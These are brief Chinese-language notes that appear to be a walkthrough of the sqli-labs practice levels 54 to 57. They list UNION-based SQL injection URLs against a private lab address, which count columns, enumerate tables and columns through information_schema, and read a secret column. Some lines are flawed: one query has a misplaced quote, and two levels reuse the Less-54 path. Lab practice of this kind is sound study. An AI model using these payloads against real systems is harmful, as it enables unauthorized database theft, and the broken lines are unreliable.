54关
http://192.168.43.141:81/Less-54/index.php?id=1'
查询字段名
/192.168.43.141:81/Less-54/index.php?id=1' order by 3 --+
查询表名查询库名字段名
/192.168.43.141:81/Less-54/index.php?id=-1' union select 1,2,3 --+
/192.168.43.141:81/Less-54/index.php?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
/192.168.43.141:81/Less-54/index.php?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='UABHLDJV9V' --+
/192.168.43.141:81/Less-54/index.php?id=-1' union select 1,group_concat(secret_NAKC),3 from 'UABHLDJV9V --+
55关
http://192.168.43.141:81/Less-54/index.php?id=1)
...剩下的与54关类似
56
http://192.168.43.141:81/Less-54/index.php?id=1")
...剩下的与54关类似
57
http://192.168.43.141:81/Less-57/?id=-1%22%20union%20select%201,2,3%20--+
...剩下的与54关类似